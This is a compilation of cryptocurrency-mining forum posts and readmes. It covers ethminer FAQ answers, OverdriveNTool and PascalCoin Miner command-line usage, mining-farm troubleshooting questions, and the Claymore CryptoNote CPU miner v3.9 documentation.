Because of the GDDR5X memory, which can't be fully utilized for ETH mining (yet).
3. Are AMD cards also affected by slowdowns with increasing DAG size?
Only GCN 1.0 GPUs (78x0, 79x0, 270, 280), but in a different way. You'll see that on each new epoch (30K blocks), the hashrate will go down a little bit.
4. Can I still mine ETH with my 2GB GPU?
Not really, your VRAM must be above the DAG size (Currently about 2.15 GB.) to get best performance. Without it severe hash loss will occur.
5. What are the optimal launch parameters?
The default parameters are fine in most scenario's (CUDA). For OpenCL it varies a bit more. Just play around with the numbers and use powers of 2. GPU's like powers of 2.
6. What does the --cuda-parallel-hash flag do?
@davilizh made improvements to the CUDA kernel hashing process and added this flag to allow changing the number of tasks it runs in parallel. These improvements were optimised for GTX 1060 GPUs which saw a large increase in hashrate, GTX 1070 and GTX 1080/Ti GPUs saw some, but less, improvement. The default value is 4 (which does not need to be set with the flag) and in most cases this will provide the best performance.
7. What is ethminer's relationship with Genoil's fork?
Genoil's fork was the original source of this version, but as Genoil is no longer consistently maintaining that fork it became almost impossible for developers to get new code merged there. In the interests of progressing development without waiting for reviews this fork should be considered the active one and Genoil's as legacy code.
8. Can I CPU Mine?
No, use geth, the go program made for ethereum by ethereum.



OverdriveNTool

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Hi all
This application is for editing some parameters in the latest AMD OverdriveNext API supported GPUs (currently 290, 290x, 390, 390x, Fury, Fury X, Nano, 4xx, 5xx series, Vega 56, Vega 64, Vega FE)
I've made this because WattTool has stopped working since driver 17.7.2.

Requirements:

System Windows
GPU AMD 290, 290x, 390, 390x, Fury, Fury X, Nano, 4xx, 5xx series, Vega 56, Vega 64, Vega FE
Driver 17.7.2
Download:

OverdriveNTool-0.2.6

Command Line:

-p[gpu_id]"Name"
apply profile "Name" to GPU with id=[gpu_id]
-c[gpu_id]"Name"
same as above, but with confirmation message that application started and everything went ok.
-r[gpu_id]
reset GPU with id=[gpu_id]
cp[gpu_id]"Name"
compare current values of GPU with id=[gpu_id] with profile "Name", and eventually set this profile if not equal
cm[gpu_id]"Name"
compare current values of GPU with id=[gpu_id] with profile "Name", and eventually set this profile if not equal, with additional message if not equal found
co[gpu_id]"Name"
only compare current values of GPU with id=[gpu_id] with profile "Name", with message if not equal found
-consoleonly
displays all messages (eg. errors) in cmd.exe console window, instead of gui messages. Only commands that are put after -consoleonly are affected, example:
"OverdriveNTool.exe" -consoleonly -r0 -p0"1" -r1 -p1"1" -r2 -p2"2" - will affect all commands
"OverdriveNTool.exe" -r0 -p0"1" -r1 -consoleonly -p1"1" -r2 -p2"2" - will affect -p1"1" -r2 -p2"2" commands only

[gpu_id] - it's the first number taken from GPU description, for single video card it's 0
"Name" - name of the profile that was saved ealier, must be quoted if has spaces inside

example:

OverdriveNTool.exe -p0myProfile -p1"Profile 2"
In this example application starts without gui, then sets "myProfile" to GPU with id=0 and "Profile 2" to GPU with id=1 and then exit.

commands can be used all together, for example:

OverdriveNTool.exe -p0myProfile -r0 co1"Profile 1"
On configs with more than 10 GPUs [gpu_id] must have 2 digits, for GPUs 0-9 leading 0 must be added, example: 00,01,02,03,04,05,06,07,08,09,10,11,12. Usage example: -p05"Name"
It's possible to use * as [gpu_id], which means it affects all supported GPUs, example:
-r* -p*MyProfile -p2"Custom profile" cm*MyProfile

Additional info:

-Workaround for bug in 17.7.2 drivers, when driver sometimes uses default voltages instead of user settings: use reset and re-apply profile.
-It's possible to disable/enable each P state. To do this click on P0, P1.. etc. label. If P state is disabled it will not be used by GPU.
-I2C currently supports: IR3567B (RX470, RX480, some RX5xx), up9505 (MSI RX5xx)
-If you prefer to not touch fan settings it's possible to deactivate Fan section for each GPU. To do this press Ctrl + double click somewhere on the Fan box. It's saved per gpu_id, so GUI or commandline will not touch fan settings for such GPU.
-To open Settings or SoftPowerPlayTable editor left click on top-left program icon, or right click on the titlebar.

Current version: 0.2.6 (29.03.2018)
Filename: OverdriveNTool.exe
MD5: 7816F1F8096447F2F8AAF794E0E20B50
SHA-1: 8891359E382256162F9946667E829C429189CB6A





Electricity cost caught up to mining profits, what else can be done?

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Hi. With the recent drop of Eth to 500+, Potential earnings will either be 0, or some losses due to electricity bill. Am struggling to justify continuous operation. Should I stop? Or can I change to other crypto? It seems from whattomine, eth is still the most profitable.

PascalCoin Miner

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PascalCoin Miner - Version: 2.1

Downloads - PascalCoin Miner

Usage: PascalCoinMiner.exe -h -s S -p X -d Y -c N -n MYNAME
-h for help
-s S (S is PascalCoin server ort where default value is localhost:4009)
-p X (X is GPU platform)
-d Y (Y is GPU device for platform)
Y can be multiple devices. Example -d 0,2,3 Will use devices 0, 2 and 3
-c N (For CPU mining, where N is CPU's to use. Activating this disable GPU mining)
-n MYNAME (Will add MYNAME value to miner name assigned by server)

Basic example CPU mining:
PascalCoinMiner.exe -s 192.168.1.77:4009 -c 2 -n USER_1
(2 CPU's to server 192.168.1.77 port 4009 and miner name USER_1)
Basic example GPU mining:
PascalCoinMiner.exe -p 0 -d 0 -s -n ABC
(p 0 d 0 at server localhost:4009 miner name ABC)


** Platforms (Total 2)
Platform 0 Name:Intel(R) OpenCL Version:OpenCL 1.2 Vendor:Intel(R) Corporation CPU's:1 GPU's:1 Devices: 2
Platform 1 Name:NVIDIA CUDA Version:OpenCL 1.2 CUDA 8.0.0 Vendor:NVIDIA Corporation CPU's:0 GPU's:1 Devices: 1

** Platforms and devices available: (Total 3)
-p 0 -d 0 Name:Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz Compute Units:8 Max Freq.:2400
-p 0 -d 1 Name:Intel(R) HD Graphics 4000 Compute Units:16 Max Freq.:1150
-p 1 -d 0 Name:GeForce GTX 680M Compute Units:7 Max Freq.:771

PascalCoinMiner -p 0 -d 0,1,2,4 -s localhost:4009 -n valeratv
pause

SMALL MINING FARM PROBLEM, ASUS RX470 4GB MINING EDITION

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Dear comunity,

I make this post because we are trying to make a small mining farm with 100 rigs. this are the spec:

- ASUS RX470 4GB MINING
- ASROCK H110
- CELERON G3930
- 4GB DDR4
- 2 X CORSAIR RM1000X/I

https://i.imgur.com/boVIGuL.jpg

https://i.imgur.com/TDhLVtA.jpg

We got also few rigs with Nvidia 1070 and 1080ti, works perfectly. but now making this new project we found those issues:

- Randomly crashed rigs, we use simplemining OS and Ethos. I'm pretty sure that there are not defects on those rigs, until they were moved to the big place they work months without crash. Now we encounter randoms crash in differents rigs everyday. Do you know if possible both OS cause trouble on the same LAN?

- We ordered from asus the most part of our GPUs, the RX470 4gb mining edition. Since now all we mount are ELPIDA memories.

https://i.imgur.com/kPSWK9c.jpg

https://i.imgur.com/HnfmOEw.jpg

We modded the bios very carefully, they seems to work with the mems (1900 and 1000mv) and leaving automatic voltage on gpu, timings are set on 1500 straps. We tryied to do more undervolting on mem but seems to crash, also gpu without automatic voltages give lots of problems.

About 10% of the total gpu lot are defective, they don't mine even with stock settings, they crash to 0 mhs on claymore. Do you guys have any clue on this?

I will be very thanksfull if anyone could provide me support on this. Any details you need please ask me.

Best regards,

Claymore's CryptoNote Windows CPU Miner v3.9

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Claymore's CryptoNote Windows CPU Miner

Current version: 3.9

- fixed issue with devfee failover.
- fixed critical issues in remote management feature (attacker could crash miner even in read-only mode).
- added "-mpsw" parameter.


Download here :

Claymore's CryptoNote Windows CPU Miner v3.9


This is POOL version.

This version is for Windows x64, Windows x86 is supported up to v3.4 only. No Linux support planned.

This version uses AES-NI if CPU supports it, but also works with older CPUs that don' support AES-NI.

This miner is free-to-use, however, current developer fee is 2.5%, miner mines 39 rounds for you and 1 round for developer. If you use encrypted connection ("ssl://") the developer fee is 2%.
If you don't agree with dev fee - don't use this miner, or use "-nofee" option.
Attempts to cheat and remove dev fee will cause a bit slower mining speed (same as "-nofee 1") though miner will show same hashrate.


COMMAND LINE OPTIONS:

-o pool address. Both HTTP and Stratum protocol are supported. You can specify several "-o" parameters to use several pools, or use "pools.txt" file, or use both.
First pool specified via "-o" option is main pool: miner will switch to main pool every 30 minutes.
Miner also supports SSL/TLS encryption for all data between miner and pool (if pool supports encryption), it significantly improves security.
To enable encryption, use "ssl://" or "stratum+ssl://" prefix (or "tls" instead of "ssl").

-u your wallet address.

-p password, use "x" as password.

-t number of threads. "-t 0" - autoselection. Autoselection does not work fine in all cases, so try different values.
Optimal value depends mostly on L3 cache size.
For example, if your CPU has 8 MB of L3 cache (i7 CPUs), use "-t 4". For 6MB L3 cache (i5 CPUs) use "-t 3".

-allpools Specify "-allpools 1" if miner does not want to mine on specified pool (because it cannot mine devfee on that pool), but you agree to use some default pools for devfee mining.
Note that if devfee mining pools will stop, entire mining will be stopped too.

-lowcpu low CPU usage mode. In this mode only one CPU thread is used but the speed is much higher than in "-t 1" mode.
This mode is useful for mining in background when minimal CPU usage is required instead of maximal mining speed.
Possible values are "-lowcpu 1" or "-lowcpu 2". For example, on i7 4770 CPU "-lowcpu 2" shows about 180 h/s on a single CPU thread.
This option is available only for CPUs that support AES-NI.

-ee close miner if no more pools are available in the list. By default, miner tries all pools one by one, after last pool it tries first pool again and so on.
Use "-ee 1" to close miner when it tried all pools, so you can restart it from some script and do some additional actions related to internet connectins if necessary.

-dbg debug log and messages. "-dbg 0" (default) - create log file but don't show debug messages.
"-dbg 1" - create log file and show debug messages. "-dbg -1" - no log file and no debug messages.

-nofee: set "1" to cancel my developer fee at all. In this mode some recent optimizations are disabled so mining speed will be slower by about 5%.
By enabling this mode, I will lose 100% of my earnings, you will lose only 2.5% of your earnings.
So you have a choice: "fastest miner" or "completely free miner but a bit slower".
If you want both "fastest" and "completely free" you should find some other miner that meets your requirements, just don't use this miner instead of claiming that I need
to cancel/reduce developer fee, saying that 2-2.5% developer fee is too much for this miner and so on.

-r Restart miner mode. "-r 0" (default) - restart miner if something wrong. "-r -1" - disable automatic restarting. -r >0 - restart miner if something
wrong or by timer. For example, "-r 60" - restart miner every hour or when some worker thread failed.

-retrydelay delay, in seconds, between connection attempts. Default values is "20". Specify "-retrydelay -1" if you don't need reconnection, in this mode miner will exit if connection is lost.

-ftime failover main pool switch time, in minutes, see "Failover" section below. Default value is 30 minutes, set zero if there is no main pool.

-mport remote monitoring/management port. Default value is -3333 (read-only mode), specify "-mport 0" to disable remote monitoring/management feature.
Specify negative value to enable monitoring (get statistics) but disable management (restart, uploading files), for example, "-mport -3333" enables port 3333 for remote monitoring, but remote management will be blocked.
You can also use your web browser to see current miner state, for example, type "localhost:3333" in web browser.
Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!
By default, miner will accept connections on specified port on all network adapters, but you can select desired network interface directly, for example, "-mport 127.0.0.1:3333" opens port on localhost only.

-mpsw remote monitoring/management password. By default it is empty, so everyone can ask statistics or manage miner remotely if "-mport" option is set. You can set password for remote access (at least EthMan v3.0 is required to support passwords).

-colors enables or disables colored text in console. Default value is "1", use "-colors 0" to disable coloring. Use 2...4 values to remove some of colors.

-v displays miner version, sample usage: "-v 1".


CONFIGURATION FILE

You can use "config.txt" file instead of specifying options in command line.
If there are not any command line options, miner will check "config.txt" file for options.
If there is only one option in the command line, it must be configuration file name.
If there are two or more options in the command line, miner will take all options from the command line, not from configuration file.
Place one option per line, if first character of a line is ";" or "#", this line will be ignored.
You can also use environment variables in "epools.txt" and "config.txt" files. For example, define "WORKER" environment variable and use it as "%WORKER%" in config.txt or in epools.txt.


SAMPLE USAGE

unsecure connection:
NsCpuCNMiner64.exe -o stratum+tcp://mine.moneropool.org:80 -u 449TGay4WWJPwsXrWZfkMoPtDbJp8xoSzFuyjRt3iaM4bRHdzw4qoDu26FdcGx67BMDS1r2bnp7f5hF 6xdPWWrD3Q3Wf7G6 -p x

SSL/TLS connection:
miningpoolhub (this pool detects encryption automatically so it uses same port as for unencrypted connection):
NsCpuCNMiner64.exe -o ssl://us-east.cryptonight-hub.miningpoolhub.com:20580 -u YourLogin.YourWorker -p x

Do not forget to specify your wallet address!


FAILOVER

Use "epools.txt" file to specify additional pools. This file has text format, one pool per line. Every pool has 3 connection attempts.
Miner disconnects automatically if pool does not send new jobs for a long time or if pool rejects too many shares.
If the first character of a line is ";" or "#", this line will be ignored.
Do not change spacing, spaces between parameters and values are required for parsing.
If you need to specify "," character in parameter value, use two commas - ,, will be treated as one comma.
Pool specified in the command line is "main" pool, miner will try to return to it every 30 minutes if it has to use some different pool from the list.
If no pool was specified in the command line then first pool in the failover pools list is main pool.
You can change 30 minutes time period to some different value with "-ftime" option, or use "-ftime 0" to disable switching to main pool.


REMOTE MONITORING/MANAGEMENT

Miner supports remote monitoring/management via JSON protocol over raw TCP/IP sockets. You can also get recent console text lines via HTTP.
Start "EthMan.exe" from "Remote management" subfolder (Windows version only).
Check built-in help for more information. "API.txt" file contains more details about protocol.


PERFORMANCE

About 280 h/s on i7-4770 ("-t 4")
About 170 h/s on i5-4430 ("-t 3")
32bit version is slower than 64bit version in 1.5-2.0 times, about 190 h/s on i7-4770.



TROUBLESHOOTING

For most cases miner shows detailed error messages with explanations. To achieve maximal mining speed, start miner with admin rights once (miner must show "scfg: 1"),
it will configure system for optimal performance; then reboot computer to apply changes. For normal work no admin rights or other permissions are required. However,
if you use Windows UAC and start miner as admin in non-elevated mode miner will not work. Either create normal user and start miner there, or disable UAC.
Miner must show "FAST MODE ENABLED" message if everything is ok.
Sometimes reboot is necessary to clean RAM, otherwise miner can show "not enough memory" error.

Low speed in Windows 8.1 x64:

1. Make sure you are logged as admin. Create shortcut for NsCpuCNMiner64.exe on desktop.
2. Open shortcut properties, and specify command line parameters, for example:
C:\miner\NsCpuCNMiner64.exe -o stratum+tcp://mine.moneropool.org:80 -u 449TGay4WWJPwsXrWZfkMoPtDbJp8xoSzFuyjRt3iaM4bRHdzw4qoDu26FdcGx67BMDS1r2bnp7f5hF 6xdPWWrD3Q3Wf7G6 -p x
3. Press "Advanced" button, check "Run As Administrator". Also disable UAC and reboot (perhaps this step is not ncessary for your configuration).
4. Start shortcut, I get about 290 h/s on stock i7-4770 in Windows 8.1 x64.



FAQ:

Q: Why do I see more shares for devfee than in my mining for the same time?
A: Most pools support variable diff, they change "target share" after some time after connection. For example, you have very powerful rig, after connection you will send shares very often. It takes some CPU time to check your shares so after some time pool will send higher share target and miner will send less shares (but they will have more value). When pool updates share target you will see "Pool sets new share target" line in the miner. This way pool can adjust the number of shares that miner sends and balance its load.
So check the log or console text to see current target for main mining thread and for devfee thread. For example:
DevFee: Pool sets new share target: 0x0083126e (diff: 500H) - this is for devfee mining connection
Pool sets new share target: 0x0024fa4f (diff: 1772H) - this is for main mining connection
As you can see, target share for main mining is higher in about 3.5 times, so for main mining miner sends in 3 times less shares (but they have 3x more value) than for devfee mining.

Q: Miner freezes if I put cursor to its window in Windows 10 until any key is pressed. Sometimes miner freezes randomly until any key is pressed.
A: You should make some changes in Windows:
https://superuser.com/questions/555160/windows-command-prompt-freezing-on-focus
https://superuser.com/questions/419717/windows-command-prompt-freezing-randomly?rq=1
https://superuser.com/questions/1051821/command-prompt-random-pause?rq=1




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